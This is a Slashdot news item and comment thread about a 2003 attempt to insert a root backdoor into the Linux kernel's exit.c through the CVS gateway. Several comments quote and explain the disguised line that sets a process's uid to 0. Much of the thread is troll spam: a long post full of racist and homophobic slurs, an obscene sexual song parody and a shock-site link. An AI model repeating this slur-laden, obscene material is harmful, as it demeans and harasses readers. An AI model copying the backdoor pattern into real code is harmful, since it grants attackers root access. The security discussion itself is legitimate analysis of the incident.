Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Linux Kernel Back-Door Hack Attempt Discovered

simoniker posted more than 10 years ago | from the intrigue-and-skullduggery dept.

Software 687

An anonymous reader writes "The BitKeeper to CVS gateway was apparently hacked in an attempt to add a root exploit back door to the Linux kernel, according to the linux-kernel archive. The change was in the file kernel/exit.c and changed the user ID of a process to root under the guise of checking the validity of some flags. The core Linux BitKeeper kernel repository was not at risk, and in fact it was the BitKeeper CVS export scripts that detected the unauthorized modifications to CVS. The changes were falsely attributed in CVS to long-time Linux developer davem (David Miller). Users of the BKCVS repository should resync their trees to remove the offending code if they had replicated it since yesterday."

Sorry! There are no comments related to the filter you selected.

Don't forget... (-1)

SCO$1499FeeTroll (720726) | more than 10 years ago | (#7404293)

...to pay your $1499 licensing fee you cock-smoking teabaggers.

Neo_Trinity both DIE Zion saved with deal (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404296)

Agent Smith shows turns the Oracle into a copy of himself. Neo and Trinity take one ship and head off to the machine city, Morpheus and the others head back to Zion. The Agent Smith who took over the guy's body in the real world blinds Neo, then Neo kills him. The ship crashes into the machine city and Trinity dies. The other ship makes it back to Zion and fires an EMP, killing a crapload of Sentinels but crippling Zion's defenses. Neo talks to the head machine, gets him to call a truce, and goes back into the matrix. Everyone in the Matrix is now an Agent Smith. He fights the one that used to be the Oracle. Smith beats Neo, then turns Neo into a copy of himself, then the Neo copy explodes, then all the Smiths explode. The remaining Sentinals in Zion go home without killing everyone, and the Matrix is reborn. Neo dies.

greased yoda

tsarkon reports ode to the greased yoda (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404336)

parent is a spoiler! how cool!

Re:Neo_Trinity both DIE Zion saved with deal (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404364)

Forgive me, but my English is not very good, but you maked me not hapy with this too early telling of what happen in Matrix movie.

Det ar intressant hur mycket flott som kravs for att infora en yodadocka ianaloppningen. Antagligen utfors aven handlingen av homosexuella med tendenser till grova masochistiska fantasier. Men det ar sannorlikt att det absolut varsta av handlingen ar att den stackars, oskyldiga yodadockan blir instoppad i anus utan att ha nagot att saga till om.

Re:Neo_Trinity both DIE Zion saved with deal (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404451)

Greased Up Yoda Doll is My Lover
Written & composed by Greasedyoda Jackson

He was more like a beauty queen from a star wars movie scene
I said dont mind getting greased up, but what do you mean I am the one?
Who will grease up on the floor in the round
He said I am the one who will get greased up on the floor in the round

He told me his name was Greased up Yoda, as he caused a scene
Then every purple head turned with eyes that dreamed of being the one
Who will grease up on the floor in the round

People always told me be careful of what you do
And dont go around breaking boys rectums
And mother always told me be careful of who you grease up and shove
And be careful of what you do [in the ass] ?cause the lie becomes the truth

Greased p Yoda is my lover
He's just a "girl" who claims that I am the one
But the kid is my greased up Yoda and my son
He says I am the one, but the kid is my greased up Yoda doll!

For forty days and forty nights
The law was on his side
But who can stand when hez in demand
His schemes and plans
cause we greased up on the floor in the round
So take my strong advice, just remember to always shove it up a greased ass twice
(do shove twice)

He told my baby, we where anally gyrating till 3:00
Then he looked at me, he showed me a photo
My anal lover cried, cause his anus wasnt as wide as mine

People always told me be careful of what you do
And dont go around shoving Greased Yoda Dolls in you ass!
He came and stood right up my ass.
Then the smell of sweet anal fumes
This happened much too soon
He called me to his room

Greased Up Yoda Doll is my lover
Hez just a doll who claims that I am the one
But the greasy anal remnants is my son
Greased Up Yoda Doll is my lover
Hez just a guy who claims that I am the one
But the Yoda doll is my anal toy
He says I am the one, but the Doll is in my ass
He says I am the one, but the Doll is in my ass
Greased Up Yoda Doll is my lover
Hez just a doll who claims that I am the one
But the Yoda doll is my anal toy
He says I am the one, but the Doll is in my ass
He says I am the one, but the Doll is in my ass
Greased Up Yoda Doll is my lover
Greased Up Yoda Doll is my lover
Greased Up Yoda Doll is my lover
Greased Up Yoda Doll is my lover
Greased Up Yoda Doll is my lover
Greased Up Yoda Doll is my lover

GNAA Announces acquisition of SCO (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404297)

GNAA Announces acquisition of SCO
By Tim Copperfield
New York, NY - GNAA (Gay Nigger Association of America) today announced acquisition of The SCO Group [yahoo.com] for $26.9 million in stock and $40 million in gay niggers.

GNAA today announced it has signed a definitive agreement to acquire the intellectual property and technology assets of The SCO Group, a leading provider of Fear, Uncertainty and Doubt, based in Lindon, Utah. GNAA's acquisition of SCO technology will help GNAA sign up more members worldwide. In addition to developing new solutions, GNAA will use SCO engineering expertise and technology to enhance the GNAA member services.

"I'd love to see these GNAA types slowly consumed by millions of swarming microbes and converted into harmless and useful biochemicals." said an anonymous slashdot poster, blinded by the GNAA success in achieving first post on a popular geek news website, slashdot.org [slashdot.org] .

"This GNAA shit is getting out of hand. Slashdot needs troll filters. Or better yet a crap flood mod that I can exclude from my browsing. Seriously, a good troll is art, what you dumb fucks are doing is just plain stupid." said spacecowboy420.

macewan, on linuxquestions [linuxquestions.org] said "Thanks for that link to the SCO quotes page. My guess is that they want to be bought out. Hrm, think they want GNAA to buy them??"

After careful consideration and debate, GNAA board of directors agreed to purchase 6,426,600 preferred shares and 113,102 common shares (the equivalent of 150,803 ADSs) of SCO, for an aggregate consideration of approximately US$26.9 million and approximately $40 million for gay niggers that were working in Lindon, Utah offices of The SCO Group.

If all goes well, the final decision is to be expected shortly, followed by transfer of most SCO niggers from their Lindon, UT offices to the GNAA Headquarters in New York.

About GNAA
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which
gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.

Are you GAY [klerck.org] ?
Are you a NIGGER [mugshots.org] ?
Are you a GAY NIGGER [gay-sex-access.com] ?

If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!
Join GNAA (GAY NIGGER ASSOCIATION OF AMERICA) today, and enjoy all the benefits of being a full-time GNAA member.
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America. You, too, can be a part of GNAA if you join today!

Why not? It's quick and easy - only 3 simple steps!

First, you have to obtain a copy of GAY NIGGERS FROM OUTER SPACE THE MOVIE [imdb.com] and watch it.

Second, you need to succeed in posting a GNAA "first post" on slashdot.org [slashdot.org] , a popular "news for trolls" website

Third, you need to join the official GNAA irc channel #GNAA on EFNet, and apply for membership.
Talk to one of the ops or any of the other members in the channel to sign up today!

If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is EFNet, and you can connect to irc.secsup.org or irc.isprime.com as one of the EFNet servers.
If you do not have an IRC client handy, you are free to use the GNAA Java IRC client by clicking here [nero-online.org] .

About SCO
The SCO Group [SCOX [yahoo.com] ] helps millions of gay niggers in more than 82 countries around the world grow their penises everyday. Headquartered in Lindon, Utah, SCO has a network of more than 11,000 nigger resellers and 8,000 developers. SCO Global Services provides reliable nigger support and services to prospective members and customers.
SCO and the associated SCO logo are trademarks or registered trademarks of The SCO Group, Inc. in the U.S. and other countries. UNIX and UnixWare are registered trademarks of The Open Group in the United States and other countries. All other brand or product names are or may be trademarks of their respective owners.

This news release contains forward-looking statements that involve risks, uncertainties and assumptions. All statements other than statements of historical fact are statements that could be deemed forward-looking statements. These statements are based on management's current expectations and are subject to uncertainty and changes in circumstances. Actual results may vary materially from the expectations contained herein. The forward-looking statements contained herein include statements about the consummation of the transaction with SCO and benefits of the pending transaction with SCO. Factors that could cause actual results to differ materially from those described herein include the inability to obtain regulatory approvals and the inability to successfully integrate the SCO business. GNAA is under no obligation to (and expressly disclaims any such obligation to) update or alter its forward-looking statements, whether as a result of new information, future events or otherwise.


If you have mod points and would like to support GNAA, please moderate this post up.

________________________________________________
| ______________________________________._a,____ |
| _______a_._______a_______aj#0s_____aWY!400.___ |
| __ad#7!!*P____a.d#0a____#!-_#0i___.#!__W#0#___ |
| _j#'_.00#,___4#dP_"#,__j#,__0#Wi___*00P!_"#L,_ |
| _"#ga#9!01___"#01__40,_"4Lj#!_4#g_________"01_ |
| ________"#,___*@`__-N#____`___-!^_____________ |
| _________#1__________?________________________ |
| _________j1___________________________________ |
| ____a,___jk_GAY_NIGGER_ASSOCIATION_OF_AMERICA_ |
| ____!4yaa#l___________________________________ |
| ______-"!^____________________________________ |
` _______________________________________________'

Let the obscene anal jokes begin! (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404298)

C'mon...this is begging for it.

OH shit, here we go again (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404299)

Time for RMS to spout off about needing a "Free" replacement to BitKeeper again?

Well well (4, Insightful)

toddhunter (659837) | more than 10 years ago | (#7404305)

Good to see the system works. You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?

Re:Well well (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404317)

Most likely it would have been detected. We just wouldn't have heard about it.

Most companies use pretty good CVS-like tools.

Re:Well well (0)

Anonymous Coward | more than 10 years ago | (#7404318)

Problem is, it wasn't detected in time to keep it from replicating out. Ooops.

Re:Well well (5, Interesting)

chill (34294) | more than 10 years ago | (#7404358)

Good to see the system works. You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?

You mean like Borland's Interbase? The compiled in backdoor [cert.org] wasn't discovered until after the database opensourced.

My favorite quote from the advisory is:

"This vulnerability was not introduced by unauthorized modifications to the original vendor's source. It was introduced by maintainers of the code within Borland. The back door account password cannot be changed using normal operational commands, nor can the account be deleted from existing vulnerable servers [see References]."

How long was it in there? "These security holes affect all version of InterBase shipped since 1994, on all platforms."

The advisory dates from 2001 -- you do the math.

Re:Well well (4, Insightful)

blastedtokyo (540215) | more than 10 years ago | (#7404401)

Hmmm..but would they have even found the security hole if it hadn't been open sourced?

Re:Well well (3, Insightful)

alannon (54117) | more than 10 years ago | (#7404438)

Why is this relevant? The fact that anybody that HAD seen the source code to Interbase could exploit it was enough. This could include ex-employees and contractors. Would you be happy with Microsoft including a back-door to all their software as long as only they knew how to exploit it?

Re:Well well (1)

stephanruby (542433) | more than 10 years ago | (#7404519)

I think the parent was making an argument for open source by saying that the exploit would never have been found if the product had remained proprietary and the people that implemented the back door could have used that back door forever and ever.

Re:Well well (1, Interesting)

Geek of Tech (678002) | more than 10 years ago | (#7404549)

> Why is this relevant? The fact that anybody that HAD seen the source code to Interbase could exploit it was enough. This could include ex-employees and contractors. Would you be happy with Microsoft including a back-door to all their software as long as only they knew how to exploit it?

What?! They don't already? Oh I forgot the Backdoor, uh, I mean DRM isn't due in Windows until Longhorn...

A friend showed me that once. (1)

TekReggard (552826) | more than 10 years ago | (#7404568)

You can do the same thing in a few other operating systems. I believe one of them is a unix of sorts but I do not know which one nor have I gone to look for it.

3 cheers for monolithic kernals (0)

Anonymous Coward | more than 10 years ago | (#7404402)

This is why monolithic kernals, liek the OpenBSD kernel are bettar. Since Theo dee Raddt is the only one who can edit the code, he is the only one that can add or remove back doors and exploits, so this kind of thing would not happen.

Re:3 cheers for monolithic kernals (2, Informative)

nathanh (1214) | more than 10 years ago | (#7404447)

This is why monolithic kernals, liek the OpenBSD kernel are bettar. Since Theo dee Raddt is the only one who can edit the code...

You honestly have no idea what a "monolithic kernel" is, do you.

Or HIBT.

Re:3 cheers for monolithic kernals (2, Funny)

_Sprocket_ (42527) | more than 10 years ago | (#7404550)

When you troll like that, I think you're supposed to have some throw-away account so you can collect karma in some misguided intent to abuse the moderation system. I hear that's what all the kids are doing these days.

(wait - am I supposed to say "here goes my karma" at this point?) :)

Re:Well well (4, Funny)

Anonymous Coward | more than 10 years ago | (#7404408)

You would wonder what would happen if said hacker was working for a company on a similar closed source program. Would it have been detected?


Well the 12 backdoors I put into the Windows XP kernel haven't been detected yet.

Re:Well well (5, Interesting)

Narphorium (667794) | more than 10 years ago | (#7404469)

Although I see where you're going with this, I think a lot of people might ask whether this shows vulnerability in OSS instead. Sure, you and I appreciate this as a validation of the system but is that really how the media is going to portray it?

All I'm saying is that I certainly won't be surprised when closed source vendors start using this in their anti-OSS campaigns.

Re:Well well (4, Insightful)

The Munger (695154) | more than 10 years ago | (#7404480)

Good to see the system works.

And what if we just haven't discovered the code that got through yet...

You've got to ask - assume nothing.

+5, Tin-foil hat.

Re:Well well (3, Insightful)

Geek of Tech (678002) | more than 10 years ago | (#7404570)

Well, I guess that means all the closed source developers have the same problem. And I guess they probably don't know either.

Re:Well well (1)

Mr Europe (657225) | more than 10 years ago | (#7404496)

You don't say that the said hacker IS working for a company on similar closed source program (=unmentioned closed source operating systems) ?! :o

Linux is dead (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404307)

Long live FreeBSD!

Re:Linux is dead (-1, Flamebait)

Anonymous Coward | more than 10 years ago | (#7404379)

Sweet, we'll just tell these guys [kerneltrap.org] that FreeBSD 5 will be scalable enough to... err... be very scalable. Hah!

Daaaammmmmnnnn.. (4, Funny)

NegativeK (547688) | more than 10 years ago | (#7404310)

Someone has some damned big balls to do something like that...

Let's hope they're cut off.

Microsoft (3, Funny)

mr100percent (57156) | more than 10 years ago | (#7404311)

Anybody point fingers at Microsoft yet? SCO?

Re:Microsoft (5, Funny)

Cobralisk (666114) | more than 10 years ago | (#7404339)

No, but I'd like to see them claim copyright infringement on back-door code.

Re:Microsoft (1)

hpavc (129350) | more than 10 years ago | (#7404425)

Dunno if there is anything here of public value:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;

Re:Microsoft (-1, Flamebait)

calcifer (649855) | more than 10 years ago | (#7404493)

bill gates could easily claim prior art on the backdoor code. cuz he is of the gay homosex. get it? backdoor=anal. I BRING TEH FUNNAY

Re:Microsoft (1)

rlowe69 (74867) | more than 10 years ago | (#7404375)

Anybody point fingers at Microsoft yet? SCO?

Why stop there? ... you have six more!

And two thumbs too! :P :D

Re:Microsoft (1)

Malcontent (40834) | more than 10 years ago | (#7404376)

Of course neither MS not SCO has ever acted unethically. It would be absurd to suspect companies of such high morals. I for one would be SHOCKED if somebody told me that MS or SCO might do something sleazy in order to undermine Linux.

Re:Microsoft (2, Interesting)

MrLint (519792) | more than 10 years ago | (#7404391)

My guess is more likely DDoS and spam hackers. Looking for ways to get in and grab more things to attack with.

Nah (0, Troll)

Greyfox (87712) | more than 10 years ago | (#7404412)

Neither one of those companies has the talent to pull this sort of thing off. It was probably some spammer looking for another couple of million hosts to hide behind now that Microsoft is posting bounties for compromising Windows code.

Re:Microsoft (1)

goranb (209371) | more than 10 years ago | (#7404444)

Microsoft has been searching for hackers [slashdot.org] ...
Obviously the bounty paid off... :)

Re:Microsoft (5, Insightful)

iabervon (1971) | more than 10 years ago | (#7404445)

The actual lines of code and the method by which they got there were far too clever for either Microsoft or SCO. In particular, it looked like a check for an invalid combination of flags by root, but would actually set the process to root in the case of the invalid combination of flags (and the error return value would be overwritten).

The intent was probably that a CVS user get the bad version, work on other stuff, and send the diff (including the bad lines) to a maintainer in an otherwise good patch. However, the BKCVS gateway got confused by someone other than it changing the CVS, and complained, and Larry McVoy pointed out the issue, someone asked what the lines were, and other people figured out what they'd do. Now, of course, if someone had gotten that bit accidentally and submitted it to a maintainer, they'd notice, so the attempt seems to have failed.

Linus pointed out a benefit to using BK: even if the official BK repository were changed, he doesn't pull from it (because his local copy has all of his changes), and he would get an error the next time he pushed to it. The repository that would have to be attacked is actually his local disk, behind a firewall and not set up for anyone else to access at all.

If RMS wants to rant about revision control systems, he'll need to say that CVS needs to be replaced with a more functional alternative (Subversion, perhaps), not BK.

Re:Microsoft (1)

coolfrood (459411) | more than 10 years ago | (#7404532)

Assuming it wasn't caught. Now somebody goes, makes changes and sends a patch to the maintainer. Isn't the maintainer going to see what the changes are? Won't a change in a totally unrelated file be very noticeable?

Conspiracy Theory (-1, Redundant)

wardomon (213812) | more than 10 years ago | (#7404313)

It was either SCO or MicroSoft, or maybe both.

Re:Conspiracy Theory (0)

Anonymous Coward | more than 10 years ago | (#7404338)

If it was SCO, they would have just planted some of their source code... Oh, maybe they did.

Re:Conspiracy Theory (1)

wthynot (570397) | more than 10 years ago | (#7404405)

That would be giving them.........way too much credit.

Re:Conspiracy Theory (0)

Anonymous Coward | more than 10 years ago | (#7404547)

Or maybe the Fedorinati. (A secret society which threatens to take over Red Hat.)

WARNING: OBLIGATORY GOATSE LINK (-1, Troll)

Anonymous Coward | more than 10 years ago | (#7404314)

J00 == T3H R0X0R! (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404461)

Thank you, kind troll! You not only saved us eight bucks, you also saved us from having to see that god-awful crapfest! And to think, the cosmic awfulness of Gigli would be overshadowed so soon!

And a goatse link!

Bad News (1)

MikeDawg (721537) | more than 10 years ago | (#7404315)

This is horrible. Thank heavens BitKeeper recognized the failed attempt to alter the code of the kernel. This is something the kernel developers should really come up and implement a plan to maintain kernel "safety".

Re:Bad News (2, Informative)

child_of_mercy (168861) | more than 10 years ago | (#7404417)

the kernel developers should really come up and implement a plan to maintain kernel "safety".

Well it got caught didn't it?

It's the quiet ones you've got to watch...

Re:Bad News (4, Insightful)

fanatic (86657) | more than 10 years ago | (#7404452)

It's the quiet ones you've got to watch...

Yes, everyone who's upset about exploits they haven't heard about, raise their hands...

Yet another reason to use open source software (3, Insightful)

Mipsalawishus (674206) | more than 10 years ago | (#7404325)

This is the reason I trust open source software. The power of peer review (in one form or another) catches these kinds of things before they are sent into the wild.

Re:Yet another reason to use open source software (3, Insightful)

mcroot (634911) | more than 10 years ago | (#7404432)

Peer review did not catch this. This was detected because people injected code into a specific place where inconsistencies are complained about by the revision control software.

Had this code come in through proper channels, I wouldn't be so sure that it would've been spotted. Most of the source code trojans people have found in the past were not well hidden, and were turned up relatively shortly. The cases I'm referring to are the trojaned configure scripts, that happened to, I believe, irssi and dsniff, or was it fragroute.. (it was definitely something by Dug Song)

If you would like to tout peer review. Could you provide a valid example ? They probably are out there, but I can't recall any, and this is not what happened here.

Re:Yet another reason to use open source software (1)

BJH (11355) | more than 10 years ago | (#7404468)

Had it come in through normal channels, I very much doubt whether it would have been committed in the first place.
kernel/exit.c is a pretty stable area of the kernel - i.e., not one that changes very often. Any patch changing it would have been looked at by at least one core kernel hacker, and while the patch was crafted to avoid compiler warnings and look relatively legitimate, trying to explain why it would be needed probably would not have been easy.

Re:Yet another reason to use open source software (1)

mcroot (634911) | more than 10 years ago | (#7404535)

By normal channels, I mean, a person with commit access having their machine compromised.

As for peer review, the person doing the back door had a decent idea, there looked to be two commits one which was +58 -0, followed by a -58 +0. The second of which said "oops, edited the wrong file". I could see where people would have seen that and said "oh, he touched the wrong file, nothing changed here, these aren't the droids I'm looking for".

Re:Yet another reason to use open source software (1)

BJH (11355) | more than 10 years ago | (#7404557)

The only person that would matter is Linus, because he'd notice if there were any change to the main BK tree that didn't come from him.

!!! rag (3, Funny)

VAXGeek (3443) | more than 10 years ago | (#7404326)

Imagine if this had sneaked into some Longhorn code right before shipping. Many eyes make few mistakes.

Re:!!! rag (1)

Makoss (660100) | more than 10 years ago | (#7404478)

Many eyes make many mistakes. But luckily they're usually connected to many mouths/fingers which yell at each other until it's more right then not.

Yay peer review.

Re:!!! rag (1)

Timesprout (579035) | more than 10 years ago | (#7404522)

This was detected by BitKeeper, not someone reading thru code, Linus's personal choice as Version Control system amid a lot of controversy if I recall correctly. Looks like he has been vindicated in his choice.

hmm (4, Funny)

Anonymous Coward | more than 10 years ago | (#7404333)

Sounds like a plan to get the dirty GNU/hippies to upgrade to the real BitKeeper instead of using the communist CVS gateway.

That McVoy is a smart one!

Did you know his programmers need to feed their families and pay their mortgages? Very sad situation, I hope everybody buys 10-15 licenses ASAP.

hehe (0, Flamebait)

lone_marauder (642787) | more than 10 years ago | (#7404334)

As usual, Microsoft is overplaying its hand. They should stick to astroturfing slashdot.

Someone needs to get with the program... (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404342)

...and that someone is everyone.

more reason to sign patches? (5, Insightful)

tomstdenis (446163) | more than 10 years ago | (#7404344)

Why not just establish a web-o-trust and sign patches?

That way people who hack in won't be able to send in signed patches to the system [e.g. even if they physicially update the tree others can trivially spot the unsigned patches].

That would of course, require people to actually think about security in terms of "oh sure people won't hack it because it hasn't been done...much...before."

Tom

Re:more reason to sign patches? (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404410)

this wouldn't solve much.. now the barrier for adding a backdoor would be hacking a contributor's computer.

Re:more reason to sign patches? (1)

KFK - Wildcat (512842) | more than 10 years ago | (#7404566)

They say they'll add GPG signatures shortly [iu.edu] , which has to be a good thing.

However, realise that this backdoor attempt was caught very early on, and by reading the comments posted on LKML, it almost certainly couldn't have been included in the main BK source tree, as updates to it would have stopped working (locally stored versions being different from the server version, this would have been immediately noticed.) So I'd say that there is already a proper verifications preventing backdoors.
Of course, more verifications can't hurt.

Re:more reason to sign patches? (1, Insightful)

Tailhook (98486) | more than 10 years ago | (#7404571)

How would a web of trust help? Odds are the backdoor was introduced by compromising some developers machine. If that is the case then whatever cert would be needed to sign a patch would probably also be compromised.

All signatures would do is raise the bar a tiny bit and provide a false sense of security. Whoever pulled this off wouldn't be hindered in the least if the bar had been a little higher. At best you would be able to point a finger at the developer responsible for the cert, but why would the perpetrator care about that?

There is no magic bullet for this kind of thing. It's Open Source and the operative word is "open." Only because it's open was this caught. Closed source is even worse.

guide to getting rid of slashdot ads (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#7404355)

#1 go to mozilla.org and get mozilla for your platform.

#2 install and go to slashdot.org

#3 right click on ads and select "block images from this server"

slashdot has gone totally crazy with advertising. what they don't realize, is that by adding more ads they are making people more likely to block them. get rid of these fucking banners and give us some text ads.

goatse goatse goatse (-1)

GuyGizmo (605399) | more than 10 years ago | (#7404356)

gaping anuses gaping anuses gaping anuses on a pumpkin? whats up with that goatse.cx

see gaping anuses anyway [goatse.cx]

I'm impressed (0, Insightful)

Anonymous Coward | more than 10 years ago | (#7404360)

This is why I think OS is the ultimate meritocracy, those who shine bright shine brighter than all, illuminating the darkness and bringing out those who lurk in the shadows.

Hmmm. (-1, Troll)

Pig Hogger (10379) | more than 10 years ago | (#7404362)

I wonder how many time this was done to the Windows NT kernel...

Re:Hmmm. (0)

Anonymous Coward | more than 10 years ago | (#7404530)

NSA Key [greenend.org.uk]

Curious abot the hack, was it remote? (3, Interesting)

nereid666 (533498) | more than 10 years ago | (#7404371)

i want to know if the hack was a remote backdoor or "only" a local root compromise. In order to how bad was the hacker that try to do this.
Thanks to the admins and developers that detect that!

Re:Curious abot the hack, was it remote? (1)

BJH (11355) | more than 10 years ago | (#7404439)

Local root, by the looks of it. The changed file was kernel/exit.c, and the change was faked to look like it was doing something, if not reasonable, at least relatively harmless. This line is the killer:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

As noted on LKML, (current->uid = 0) was probably deliberately surrounded by brackets to avoid a gcc warning of an assignment within a test.

Hats Off (1)

00RUSS (549125) | more than 10 years ago | (#7404382)

Hats off to the people who check and report this kind of stuff.

First of Many? (1)

mikewren420 (264173) | more than 10 years ago | (#7404387)

Will this be the first of more kernel backdoors, now that the idea is out there?

Re:First of Many? (5, Insightful)

nathanh (1214) | more than 10 years ago | (#7404466)

Will this be the first of more kernel backdoors, now that the idea is out there?

Isn't the pertinent question... was this the first?

Re:First of Many? (1, Informative)

Anonymous Coward | more than 10 years ago | (#7404541)

The idea [acm.org] has been out there a long time.

It makes you wonder (0, Troll)

Anonymous Coward | more than 10 years ago | (#7404389)

how many such holes are in Windows? They could never keep track of everything in the chaos at MS.

Alright.... (4, Funny)

aws4y (648874) | more than 10 years ago | (#7404421)

I'll call ESR, he's got the guns.
You guys get Linus and make sure he brings Tove, since she could probly kick all our asses.

Once thats done we'll Larry McVoy, by this time hopefully he will have the IP of the slimeball.

The Pose rides at Dawn, we can kill some Trolls along the way.

Re:Alright.... (0)

Anonymous Coward | more than 10 years ago | (#7404460)

make sure he brings Tove, since she could probly kick all our asses.
definitely...... [helsinki.fi]

So how do we know that there is only one? (3, Insightful)

dreadlord76 (562584) | more than 10 years ago | (#7404433)

Ok, so the scripts caught an attempt to install a back door. Everybody jumps up and down and sings the praise of the mighty Open Source Movement.

What if a backdoor was installed last week, or last month, but was not caught?

The fact that this was possible once, should really make people think about the possibility of it happened ALREADY, and determine if it is necessary to hunt through the code for a systematic review.

Instead, all we get is Microsoft Bashing...
Ugh

YOU DON'T SPEND MUCH TIME AROUND HERE, DO YOU? (0)

Anonymous Coward | more than 10 years ago | (#7404528)

n/t ^_^

yet another reason for (CONSTANT == var) (5, Insightful)

Anonymous Coward | more than 10 years ago | (#7404436)

In my code I always put the constant on the lhs so that the difference between the equality (==) and assignment (=) operator are caught by the compiler by accident.

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

In this case, it would make an attempted root hole more visible, as (0 = current->uid) would not compile.

Re:yet another reason for (CONSTANT == var) (1, Insightful)

Anonymous Coward | more than 10 years ago | (#7404472)

doesn't lint check for this? If checkins were automatically run through lint something like this would have been easier to detect.

Re:yet another reason for (CONSTANT == var) (1)

JonnyRo88 (639703) | more than 10 years ago | (#7404475)

Agreed, it's really a very simple improvement to put the constant on the left hand side. I didnt even know that this should be done until I was recently informed by one of the CS professors at my school that this practice can seriously cut down on debugging logic errors.

BEGIN DISCLAIMER
Now I want to make it straight and clear that this statement is not intended to put down the kernel developers in any way, but rather to agree with the parent comment that this is a good idea in general. I have nothing but respect for the kernel developers.
END DISCLAIMER

Re:yet another reason for (CONSTANT == var) (0)

Anonymous Coward | more than 10 years ago | (#7404488)

Sure, that's good defensive style.

Is the kernel usually compiled with warnings set to flag this sort of subtle "mistake" (assignment in 'if')?

Is there a (tightly controlled) list of accepted warnings which can be used to make new ones stand out?

Also strict compiler settings... (0)

Anonymous Coward | more than 10 years ago | (#7404556)

FYI, Microsoft Visual C++ 6 throws a compile warning when you try to compile that code:
[source file].cpp([line]) : warning C4706: assignment within conditional expression
If you have the project set to treat warnings as errors (as you should if you have any self respect as a programmer), this code will also not compile.

Does GCC have a warning for this code? (and does it also have the option to treat warnings as errors?)

In unrelated news, sockets.h changed a little... (0, Flamebait)

wrinkledshirt (228541) | more than 10 years ago | (#7404448)

typedef unsigned int csNetworkSocket;

#if !defined (CS_NET_SOCKET_INVALID)
// This is the stuff we stole from SCO, keep it hushed
# define CS_NET_SOCKET_INVALID ((csNetworkSocket)~0)
#endif

The more eyes... (2, Interesting)

Sean Clifford (322444) | more than 10 years ago | (#7404453)

> Setting current->uid to zero when options __WCLONE and __WALL are set? The
> retval is dead code because of the next line, but it looks like an attempt
> to backdoor the kernel, does it not?

It sure does. Note "current->uid = 0", not "current->uid == 0". Good eyes, I missed that. This function is sys_wait4() so by passing in __WCLONE|__WALL you are root. How nice.

And this is exactly why folks should insist on open source code.

Assuming it was noticed, and I have little reason to think that modification of a project's cvs tree would go unnoticed, a closed source product would have to go up and down the development chain of command. Then likely up and down the marketing chain of command while a decision was made whether to say anything about it (yeah, right) was made. Meetings would be held, blame would be assigned, and - oh yeah - a discussion about a fix would ensue.

Perhaps I exaggerate, but only a little.

I remember when a beta of a game [unnamed software publisher] was working on got ripped off our company ftp site and passed around. There was so much hype about our game that the leaked late beta was a serious disappointment and effectively killed the good buzz the marketing folks had whipped up. [It blew anyway, got shredded by the gaming rags, had a lot of potential but an inexperienced crew and very little financial support.]

Of course, this situation is nothing like that.

There's always going to be someone trying to backdoor the linux kernel, windows, osx, apps galore. Having the source on-hand to look at gives you that added level of confidence that "hey, worst case we can fix it - deal with it ourselves" rather than go through the denial, silence, lame excuse, patch cycle you go through with closed source products.

Re:The more eyes... (0)

Anonymous Coward | more than 10 years ago | (#7404511)

I bet John Romero wasn't too happy with your company and its FTP site:-)

Ebay-style attacks (3, Interesting)

blastedtokyo (540215) | more than 10 years ago | (#7404454)

While this attempt was thwarted, it makes you wonder though if someone could do an Ebay style 'attack.'

In other words: 1) Work on the code for a long time, developing good features and build up virtual reputation points so that people trust you. 2) One day decide to insert your backdoor amidst some big checkin. 3) Disappear.

It doesn't seem hard for someone to pay some random third world programmer to do this so. For example, if Red Hat had a guy in russia doing this they could, after the latest kernel was widely distributed, use it to attack Novell/SUSE.

disappear? (1)

Sean Clifford (322444) | more than 10 years ago | (#7404514)

Disappearing would only raise suspicion, not abate it. And it doesn't change the fact that this code gets reviewed a lot by a lot of different people. It would get noticed pretty quickly, methinks.

Think about how often your own code gets reviewed, debugged, optimised - not necessarily by you, but by Joe Coder on the same project or Wilma Coder some time down the road.

I doubt that someone sociopathic enough to work on something for years under a legitimate guise, then "one day" would be able to keep it together long enough to pull off the kind of coup you're proposing.

No, I tend to think that folks of this bent are found mostly among the crowd of virus authors.

Re:Ebay-style attacks (0, Offtopic)

agurkan (523320) | more than 10 years ago | (#7404525)

what is the country of attacker has anything to do with attack capability? so, the people in russia live in worse conditions than the US, they still have ethics, and some americans don't, as you yourself point out (RedHat is mostly american).
i am sorry to see that this attitude of self righteousness is being internalized by americans and europeans more and more everyday.

Re:Ebay-style attacks (1)

blastedtokyo (540215) | more than 10 years ago | (#7404565)

easy...People of different countries have different needs of money for survival, local laws, technology savvy/effectiveness of law enforcement, influence of underworld (mafia, yakuza, etc.), etc.

Ethics are an interesting thing to bring into this. I'd argue it's more rational (ethical?) for someone who's family is starving/living under life threatening conditions to do a hack job than it is for someone living in a developed country who's doing it for a little more cash.

